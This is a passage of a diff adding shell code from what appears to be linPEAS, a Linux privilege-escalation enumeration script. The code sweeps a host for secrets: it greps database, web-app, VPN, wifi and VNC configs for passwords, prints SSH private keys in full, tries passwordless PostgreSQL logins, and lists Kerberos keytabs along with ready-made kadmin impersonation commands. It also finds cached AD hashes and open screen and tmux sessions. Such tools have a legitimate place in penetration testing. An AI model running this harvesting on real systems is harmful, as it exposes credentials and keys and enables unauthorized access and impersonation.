"s,postgresql\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pgsql\.conf$\"`" ]; then echo_not_found "pgsql.conf"; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pgsql\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,pgsql\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; + + + #-- SI) PostgreSQL brute + if [ "$TIMEOUT" ]; then # In some OS (like OpenBSD) it will expect the password from console and will pause the script. Also, this OS doesn't have the "timeout" command so lets only use this checks in OS that has it. + #checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this + print_list "PostgreSQL connection to template0 using postgres/NOPASS ........ " + if [ "`timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null`" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + + print_list "PostgreSQL connection to template1 using postgres/NOPASS ........ " + if [ "`timeout 1 psql -U postgres -d template1 -c 'select version()' 2>/dev/null`" ]; then echo "Yes" | sed "s,.)*,${SED_RED}," + else echo_no + fi + + print_list "PostgreSQL connection to template0 using pgsql/NOPASS ........... " + if [ "`timeout 1 psql -U pgsql -d template0 -c 'select version()' 2>/dev/null`" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + + print_list "PostgreSQL connection to template1 using pgsql/NOPASS ........... " + if [ "`timeout 1 psql -U pgsql -d template1 -c 'select version()' 2> /dev/null`" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + echo "" + fi + + print_2title "Analyzing Mongo Files (limit 70)" + echo "Version: $(warn_exec mongo --version 2>/dev/null; warn_exec mongod --version 2>/dev/null)" + if ! [ "`echo \"$PSTORAGE_MONGO\" | grep -E \"mongod.*\.conf$\"`" ]; then echo_not_found "mongod*.conf"; fi; printf "%s" "$PSTORAGE_MONGO" | grep -E "mongod.*\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,mongod.*\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#"; done; echo ""; + + + print_2title "Analyzing Apache Files (limit 70)" + echo "Version: $(warn_exec apache2 -v 2>/dev/null; warn_exec httpd -v 2>/dev/null)" + print_3title 'PHP exec extensions' + grep -R -B1 "httpd-php" /etc/apache2 2>/dev/null + if ! [ "`echo \"$PSTORAGE_APACHE\" | grep -E \"sites-enabled$\"`" ]; then echo_not_found "sites-enabled"; fi; printf "%s" "$PSTORAGE_APACHE" | grep -E "sites-enabled$" | while read f; do ls -ld "$f" | sed -${E} "s,sites-enabled$,${SED_RED},"; for ff in $(find "$f" -name "*"); do ls -ld "$ff" | sed -${E} "s,,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "AuthType|AuthName|AuthUserFile|ServerName|ServerAlias" | grep -Ev "^#" | sed -${E} "s,AuthType|AuthName|AuthUserFile|ServerName|ServerAlias,${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_APACHE\" | grep -E \"000-default\.conf$\"`" ]; then echo_not_found "000-default.conf"; fi; printf "%s" "$PSTORAGE_APACHE" | grep -E "000-default\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,000-default\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,AuthType|AuthName|AuthUserFile|ServerName|ServerAlias,${SED_RED},g"; done; echo ""; + + + print_2title "Analyzing Tomcat Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_TOMCAT\" | grep -E \"tomcat-users\.xml$\"`" ]; then echo_not_found "tomcat-users.xml"; fi; printf "%s" "$PSTORAGE_TOMCAT" | grep -E "tomcat-users\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,tomcat-users\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "username=|password=" | sed -${E} "s,dbtype|dbhost|dbuser|dbhost|dbpass|dbport,${SED_RED},g"; done; echo ""; + + + print_2title "Analyzing FastCGI Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_FASTCGI\" | grep -E \"fastcgi_params$\"`" ]; then echo_not_found "fastcgi_params"; fi; printf "%s" "$PSTORAGE_FASTCGI" | grep -E "fastcgi_params$" | while read f; do ls -ld "$f" | sed -${E} "s,fastcgi_params$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "DB_NAME|DB_USER|DB_PASS" | sed -${E} "s,DB_NAME|DB_USER|DB_PASS,${SED_RED},g"; done; echo ""; + + + print_2title "Analyzing Http conf Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_HTTP_CONF\" | grep -E \"httpd\.conf$\"`" ]; then echo_not_found "httpd.conf"; fi; printf "%s" "$PSTORAGE_HTTP_CONF" | grep -E "httpd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,httpd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "htaccess.*|htpasswd.*" | grep -Ev "\W+\#|^#" | sed -${E} "s,htaccess.*|htpasswd.*,${SED_RED},g"; done; echo ""; + + + print_2title "Analyzing Htpasswd Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_HTPASSWD\" | grep -E \"\.htpasswd$\"`" ]; then echo_not_found ".htpasswd"; fi; printf "%s" "$PSTORAGE_HTPASSWD" | grep -E "\.htpasswd$" | while read f; do ls -ld "$f" | sed -${E} "s,\.htpasswd$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + + + print_2title "Analyzing PHP Sessions Files (limit 70)" + ls /var/lib/php/sessions 2>/dev/null || echo_not_found /var/lib/php/sessions + if ! [ "`echo \"$PSTORAGE_PHP_SESSIONS\" | grep -E \"sess_.*$\"`" ]; then echo_not_found "sess_*"; fi; printf "%s" "$PSTORAGE_PHP_SESSIONS" | grep -E "sess_.*$" | while read f; do ls -ld "$f" | sed -${E} "s,sess_.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + + + print_2title "Analyzing Wordpress Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_WORDPRESS\" | grep -E \"wp-config\.php$\"`" ]; then echo_not_found "wp-config.php"; fi; printf "%s" "$PSTORAGE_WORDPRESS" | grep -E "wp-config\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,wp-config\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "PASSWORD|USER|NAME|HOST" | sed -${E} "s,PASSWORD|USER|NAME|HOST,${SED_RED},g"; done; echo ""; + + + print_2title "Analyzing Drupal Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_DRUPAL\" | grep -E \"settings\.php$\"`" ]; then echo_not_found "settings.php"; fi; printf "%s" "$PSTORAGE_DRUPAL" | grep -E "settings\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,settings\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "drupal_hash_salt|'database'|'username'|'password'|'host'|'port'|'driver'|'prefix'" | sed -${E} "s,drupal_hash_salt|'database'|'username'|'password'|'host'|'port'|'driver'|'prefix',${SED_RED},g"; done; echo ""; + + + print_2title "Analyzing Moodle Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_MOODLE\" | grep -E \"config\.php$\"`" ]; then echo_not_found "config.php"; fi; printf "%s" "$PSTORAGE_MOODLE" | grep -E "config\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,config\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "dbtype|dbhost|dbuser|dbhost|dbpass|dbport" | sed -${E} "s,dbtype|dbhost|dbuser|dbhost|dbpass|dbport,${SED_RED},g"; done; echo ""; + + + print_2title "Analyzing Supervisord Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_SUPERVISORD\" | grep -E \"supervisord\.conf$\"`" ]; then echo_not_found "supervisord.conf"; fi; printf "%s" "$PSTORAGE_SUPERVISORD" | grep -E "supervisord\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,supervisord\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "port.*=|username.*=|password.*=" | sed -${E} "s,port.*=|username.*=|password.*=,${SED_RED},g"; done; echo ""; + + + print_2title "Analyzing Cesi Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_CESI\" | grep -E \"cesi\.conf$\"`" ]; then echo_not_found "cesi.conf"; fi; printf "%s" "$PSTORAGE_CESI" | grep -E "cesi\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,cesi\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "username.*=|password.*=|host.*=|port.*=|database.*=" | sed -${E} "s,username.*=|password.*=|host.*=|port.*=|database.*=,${SED_RED},g"; done; echo ""; + + + print_2title "Analyzing Rsync Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_RSYNC\" | grep -E \"rsyncd\.conf$\"`" ]; then echo_not_found "rsyncd.conf"; fi; printf "%s" "$PSTORAGE_RSYNC" | grep -E "rsyncd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,rsyncd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,secrets.*|auth.*users.*=,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_RSYNC\" | grep -E \"rsyncd\.secrets$\"`" ]; then echo_not_found "rsyncd.secrets"; fi; printf "%s" "$PSTORAGE_RSYNC" | grep -E "rsyncd\.secrets$" | while read f; do ls -ld "$f" | sed -${E} "s,rsyncd\.secrets$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + + + print_2title "Analyzing Hostapd Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_HOSTAPD\" | grep -E \"hostapd\.conf$\"`" ]; then echo_not_found "hostapd.conf"; fi; printf "%s" "$PSTORAGE_HOSTAPD" | grep -E "hostapd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,hostapd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,passphrase.*,${SED_RED},g"; done; echo ""; + + + #-- SI) Wifi conns + print_2title "Searching wifi conns file" + wifi=`find /etc/NetworkManager/system-connections/ -type f 2>/dev/null` + if [ "$wifi" ]; then + printf "%s\n" "$wifi" | while read f; do echo "$f"; cat "$f" 2>/dev/null | grep "psk.*=" | sed "s,psk.*,${SED_RED},"; done + else echo_not_found + fi + echo "" + + print_2title "Analyzing Anaconda ks Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_ANACONDA_KS\" | grep -E \"anaconda-ks\.cfg$\"`" ]; then echo_not_found "anaconda-ks.cfg"; fi; printf "%s" "$PSTORAGE_ANACONDA_KS" | grep -E "anaconda-ks\.cfg$" | while read f; do ls -ld "$f" | sed -${E} "s,anaconda-ks\.cfg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "rootpw.*" | sed -${E} "s,rootpw.*,${SED_RED},g"; done; echo ""; + + + print_2title "Analyzing VNC Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"\.vnc$\"`" ]; then echo_not_found ".vnc"; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "\.vnc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.vnc$,${SED_RED},"; for ff in $(find "$f" -name "passwd"); do ls -ld "$ff" | sed -${E} "s,passwd,${SED_RED},"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.c.*nf.*$\"`" ]; then echo_not_found "*vnc*.c*nf*"; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.c.*nf.*$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.c.*nf.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.ini$\"`" ]; then echo_not_found "*vnc*.ini"; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.txt$\"`" ]; then echo_not_found "*vnc*.txt"; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.txt$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.txt$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.xml$\"`" ]; then echo_not_found "*vnc*.xml"; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + + + print_2title "Analyzing Ldap Files (limit 70)" + echo "The password hash is from the {SSHA} to 'structural'" + if ! [ "`echo \"$PSTORAGE_LDAP\" | grep -E \"ldap$\"`" ]; then echo_not_found "ldap"; fi; printf "%s" "$PSTORAGE_LDAP" | grep -E "ldap$" | while read f; do ls -ld "$f" | sed -${E} "s,ldap$,${SED_RED},"; for ff in $(find "$f" -name "*.bdb"); do ls -ld "$ff" | sed -${E} "s,.bdb,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E -i -a -o "description.*" | sort | uniq | sed -${E} "s,administrator|password|ADMINISTRATOR|PASSWORD|Password|Administrator,${SED_RED},g"; done; echo "";done; echo ""; + + + print_2title "Analyzing OpenVPN Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_OPENVPN\" | grep -E \"\.ovpn$\"`" ]; then echo_not_found "*.ovpn"; fi; printf "%s" "$PSTORAGE_OPENVPN" | grep -E "\.ovpn$" | while read f; do ls -ld "$f" | sed -${E} "s,\.ovpn$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "auth-user-pass.+" | sed -${E} "s,auth-user-pass.+,${SED_RED},g"; done; echo ""; + + + #-- SI) ssh files + print_2title "Searching ssl/ssh files" + if [ "$PSTORAGE_CERTSB4" ]; then certsb4_grep=`grep -L "\"\|'\|(" $PSTORAGE_CERTSB4 2>/dev/null`; fi + sshconfig="`ls /etc/ssh/ssh_config 2>/dev/null`" + hostsdenied="`ls /etc/hosts.denied 2>/dev/null`" + hostsallow="`ls /etc/hosts.allow 2>/dev/null`" + + print_2title "Analyzing SSH Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"id_dsa.*$\"`" ]; then echo_not_found "id_dsa*"; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "id_dsa.*$" | while read f; do ls -ld "$f" | sed -${E} "s,id_dsa.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"id_rsa.*$\"`" ]; then echo_not_found "id_rsa*"; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "id_rsa.*$" | while read f; do ls -ld "$f" | sed -${E} "s,id_rsa.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"known_hosts$\"`" ]; then echo_not_found "known_hosts"; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "known_hosts$" | while read f; do ls -ld "$f" | sed -${E} "s,known_hosts$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"authorized_hosts$\"`" ]; then echo_not_found "authorized_hosts"; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "authorized_hosts$" | while read f; do ls -ld "$f" | sed -${E} "s,authorized_hosts$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"authorized_keys$\"`" ]; then echo_not_found "authorized_keys"; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "authorized_keys$" | while read f; do ls -ld "$f" | sed -${E} "s,authorized_keys$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,from=[\w\._\-]+,${SED_GOOD},g"; done; echo ""; + + + grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -${E} "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${SED_RED}," + + if [ "$TIMEOUT" ]; then + privatekeyfilesetc=`timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null` + privatekeyfileshome=`timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOMESEARCH 2>/dev/null` + privatekeyfilesroot=`timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /root 2>/dev/null` + privatekeyfilesmnt=`timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /mnt 2>/dev/null` + else + privatekeyfilesetc=`grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null` #If there is tons of files linpeas gets frozen here without a timeout + privatekeyfileshome=`grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOME/.ssh 2>/dev/null` + fi + + if [ "$privatekeyfilesetc" ] || [ "$privatekeyfileshome" ] || [ "$privatekeyfilesroot" ] || [ "$privatekeyfilesmnt" ] ; then + echo "" + print_3title "Possible private SSH keys were found!" | sed -${E} "s,private SSH keys,${SED_RED}," + if [ "$privatekeyfilesetc" ]; then printf "$privatekeyfilesetc\n" | sed -${E} "s,.*,${SED_RED},"; fi + if [ "$privatekeyfileshome" ]; then printf "$privatekeyfileshome\n" | sed -${E} "s,.*,${SED_RED},"; fi + if [ "$privatekeyfilesroot" ]; then printf "$privatekeyfilesroot\n" | sed -${E} "s,.*,${SED_RED},"; fi + if [ "$privatekeyfilesmnt" ]; then printf "$privatekeyfilesmnt\n" | sed -${E} "s,.*,${SED_RED},"; fi + echo "" + fi + if [ "$certsb4_grep" ] || [ "$$PSTORAGE_CERTSBIN" ]; then + print_3title "Some certificates were found (out limited):" + printf "$certsb4_grep\n" | head -n 20 + printf "$$PSTORAGE_CERTSBIN\n" | head -n 20 + echo "" + fi + if [ "$PSTORAGE_CERTSCLIENT" ]; then + print_3title "Some client certificates were found:" + printf "$PSTORAGE_CERTSCLIENT\n" + echo "" + fi + if [ "$PSTORAGE_SSH_AGENTS" ]; then + print_3title "Some SSH Agent files were found:" + printf "$PSTORAGE_SSH_AGENTS\n" + echo "" + fi + if [ "`ssh-add -l 2>/dev/null | grep -v 'no identities'`" ]; then + print_3title "Listing SSH Agents" + ssh-add -l + echo "" + fi + if [ "$PSTORAGE_SSH_CONFIG" ]; then + print_3title "Some home ssh config file was found" + printf "%s\n" "$PSTORAGE_SSH_CONFIG" | while read f; do ls "$f" | sed -${E} "s,$f,${SED_RED},"; cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,User|ProxyCommand,${SED_RED},"; done + echo "" + fi + if [ "$hostsdenied" ]; then + print_3title "/etc/hosts.denied file found, read the rules:" + printf "$hostsdenied\n" + cat "/etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_GREEN}," + echo "" + fi + if [ "$hostsallow" ]; then + print_3title "/etc/hosts.allow file found, trying to read the rules:" + printf "$hostsallow\n" + cat "/etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_RED}," + echo "" + fi + if [ "$sshconfig" ]; then + echo "" + echo "Searching inside /etc/ssh/ssh_config for interesting info" + cat /etc/ssh/ssh_config 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed -${E} "s,Host|ForwardAgent|User|ProxyCommand,${SED_RED}," + fi + echo "" + + #-- SI) PAM auth + print_2title "Searching unexpected auth lines in /etc/pam.d/sshd" + pamssh=`cat /etc/pam.d/sshd 2>/dev/null | grep -v "^#\|^@" | grep -i auth` + if [ "$pamssh" ]; then + cat /etc/pam.d/sshd 2>/dev/null | grep -v "^#\|^@" | grep -i auth | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + echo "" + + #-- SI) NFS exports + print_2title "NFS exports?" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe" + if [ "`cat /etc/exports 2>/dev/null`" ]; then cat /etc/exports 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,no_root_squash|no_all_squash ,${SED_RED_YELLOW}," | sed -${E} "s,insecure,${SED_RED}," + else echo_not_found "/etc/exports" + fi + echo "" + + #-- SI) Kerberos + print_2title "Searching kerberos conf files and tickets" + print_info "https://book.hacktricks.xyz/pentesting/pentesting-kerberos-88#pass-the-ticket-ptt" + kadmin_exists="`command -v kadmin`" + klist_exists="`command -v klist`" + if [ "$kadmin_exists" ]; then echo "kadmin was found on $kadmin_exists" | sed "s,$kadmin_exists,${SED_RED},"; fi + if [ "$klist_exists" ] && [ -x "$klist_exists" ]; then echo "klist execution"; klist; fi + + printf "%s\n" "$PSTORAGE_KERBEROS" | while read f; do + if [ -r "$f" ]; then + if [ "`echo \"$f\" | grep .k5login`" ]; then + echo ".k5login file (users with access to the user who has this file in his home)" + cat "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" + elif [ "`echo \"$f\" | grep keytab`" ]; then + echo "" + echo "keytab file found, you may be able to impersonate some kerberos principals and add users or modify passwords" + klist -k "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" + printf "`klist -k \"$f\" 2>/dev/null`\n" | awk '{print $2}' | while read l; do + if [ "$l" ] && [ "`echo \"$l\" | grep \"@\"`" ]; then + printf "$ITALIC --- Impersonation command: ${NC}kadmin -k -t /etc/krb5.keytab -p \"$l\"\n" | sed -${E} "s,$l,${SED_RED},g" + #kadmin -k -t /etc/krb5.keytab -p "$l" -q getprivs 2>/dev/null #This should show the permissions of each impersoanted user, the thing is that in a test it showed that every user had the same permissions (even if they didn't). So this test isn't valid + #We could also try to create a new user or modify a password, but I'm not user if linpeas should do that + fi + done + elif [ "`echo \"$f\" | grep krb5.conf`" ]; then + ls -l "$f" + cat "$f" 2>/dev/null | grep default_ccache_name | sed -${E} "s,default_ccache_name,${SED_RED},"; + elif [ "`echo \"$f\" | grep kadm5.acl`" ]; then + ls -l "$f" + cat "$f" 2>/dev/null + fi + fi + done + ls -l "/tmp/krb5cc*" "/var/lib/sss/db/ccache_*" "/etc/opt/quest/vas/host.keytab" 2>/dev/null || echo_not_found "tickets kerberos" + klist 2>/dev/null || echo_not_found "klist" + echo "" + + print_2title "Analyzing Knockd Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_KNOCKD\" | grep -E \"knockd.*$\"`" ]; then echo_not_found "*knockd*"; fi; printf "%s" "$PSTORAGE_KNOCKD" | grep -E "knockd.*$" | while read f; do ls -ld "$f" | sed -${E} "s,knockd.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + + + print_2title "Analyzing Kibana Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_KIBANA\" | grep -E \"kibana\.y.*ml$\"`" ]; then echo_not_found "kibana.y*ml"; fi; printf "%s" "$PSTORAGE_KIBANA" | grep -E "kibana\.y.*ml$" | while read f; do ls -ld "$f" | sed -${E} "s,kibana\.y.*ml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#|^[[:space:]]*$" | sed -${E} "s,username|password|host|port|elasticsearch|ssl,${SED_RED},g"; done; echo ""; + + + print_2title "Analyzing Elasticsearch Files (limit 70)" + echo "The version is $(curl -X GET '127.0.0.1:9200' 2>/dev/null | grep number | cut -d ':' -f 2)" + if ! [ "`echo \"$PSTORAGE_ELASTICSEARCH\" | grep -E \"elasticsearch\.y.*ml$\"`" ]; then echo_not_found "elasticsearch.y*ml"; fi; printf "%s" "$PSTORAGE_ELASTICSEARCH" | grep -E "elasticsearch\.y.*ml$" | while read f; do ls -ld "$f" | sed -${E} "s,elasticsearch\.y.*ml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "path.data|path.logs|cluster.name|node.name|network.host|discovery.zen.ping.unicast.hosts" | grep -Ev "\W+\#|^#"; done; echo ""; + + + ##-- SI) Logstash + print_2title "Searching logstash files" + if [ "$PSTORAGE_LOGSTASH" ]; then + printf "$PSTORAGE_LOGSTASH\n" + printf "%s\n" "$PSTORAGE_LOGSTASH" | while read d; do + if [ -r "$d/startup.options" ]; then + echo "Logstash is running as user:" + cat "$d/startup.options" 2>/dev/null | grep "LS_USER\|LS_GROUP" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed -${E} "s,$USER,${C}[1;95m&${C}[0m," | sed -${E} "s,root,${SED_RED}," + fi + cat "$d/conf.d/out*" | grep "exec\s*{\|command\s*=>" | sed -${E} "s,exec\W*\{|command\W*=>,${SED_RED}," + cat "$d/conf.d/filt*" | grep "path\s*=>\|code\s*=>\|ruby\s*{" | sed -${E} "s,path\W*=>|code\W*=>|ruby\W*\{,${SED_RED}," + done + else echo_not_found + fi + echo "" + + #-- SI) Vault-ssh + print_2title "Searching Vault-ssh files" + if [ "$PSTORAGE_VAULT_SSH_HELPER" ]; then + printf "$PSTORAGE_VAULT_SSH_HELPER\n" + printf "%s\n" "$PSTORAGE_VAULT_SSH_HELPER" | while read f; do cat "$f" 2>/dev/null; vault-ssh-helper -verify-only -config "$f" 2>/dev/null; done + echo "" + vault secrets list 2>/dev/null + printf "%s\n" "$PSTORAGE_VAULT_SSH_TOKEN" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null + else echo_not_found "vault-ssh-helper.hcl" + fi + echo "" + + #-- SI) Cached AD Hashes + adhashes=`ls "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null` + print_2title "Searching AD cached hashes" + if [ "$adhashes" ]; then + ls -l "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null + else echo_not_found "cached hashes" + fi + echo "" + + #-- SI) Screen sessions + print_2title "Searching screen sessions" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions" + screensess=`screen -ls 2>/dev/null` + if [ "$screensess" ]; then + printf "$screensess" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,No Sockets found.*,${C}[32m&${C}[0m," + else echo_not_found "screen" + fi + echo "" + + #-- SI) Tmux sessions + tmuxdefsess=`tmux ls 2>/dev/null` + tmuxnondefsess=`ps auxwww | grep "tmux " | grep -v grep` + print_2title "Searching tmux sessions"$N + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions" + if [ "$tmuxdefsess" ] || [ "$tmuxnondefsess" ]; then + printf "$tmuxdefsess\n$tmuxnondefsess\n" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,no server running on.*,${C}[32m&${C}[0m," + else echo_not_found "tmux" + fi + echo "" + + print_2title "Analyzing CouchDB Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_COUCHDB\" | grep -E \"couchdb$\"`" ]; then echo_not_found "couchdb"; fi; printf "%s" "$PSTORAGE_COUCHDB" | grep -E "couchdb$" | while read f; do ls -ld "$f" | sed -${E} "s,couchdb$,${SED_RED},"; for ff in $(find "$f" -name "local.ini"); do ls -ld "$ff" | sed -${E} "s,local.ini,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^;" | sed -${E} "s,admin.*|password.*|cert_file.*|key_file.*|hashed.*|pbkdf2.*,${SED_RED},g"; done; echo "";done; echo ""; + + + print_2title "Analyzing Redis Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_REDIS\" | grep -E \"redis\.conf$\"`" ]; then echo_not_found "redis.conf"; fi; printf "%s" "$PSTORAGE_REDIS" | grep -E "redis\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,redis\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep 